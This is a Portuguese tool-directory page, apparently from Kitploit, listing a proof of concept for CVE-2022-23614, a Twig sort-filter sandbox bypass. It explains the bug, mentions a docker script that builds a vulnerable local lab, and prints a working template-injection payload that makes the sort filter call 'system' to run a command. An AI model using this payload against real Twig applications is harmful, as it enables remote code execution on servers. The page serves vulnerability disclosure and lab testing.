Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-23614 — PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass) | Kitploit
Ferramentas/GitHubGitHub/davwwwx/cve-2022-23614
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubdavwwwx/cve-2022-23614

CVE-2022-23614

PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)

Ver Repositório
42há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-23614

PoC para CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (execução de código do filtro de classificação Twig / bypass de sandbox)

Como visto neste commit - https://github.com/twigphp/Twig/commit/.., o twig estava passando o nome da função fornecida pelo usuário como parâmetro de callback para uasort (aqui), levando assim à execução arbitrária de código

Para construir e executar o contêiner docker com uma versão vulnerável do twig

root@kitploit:~
$ ./build-docker.sh

Abra a página web em localhost:1337 e tente renderizar o seguinte payload

root@kitploit:~
{{ ['id','']|sort('system') }}

PoC PoC

Result Result

Baixar ferramenta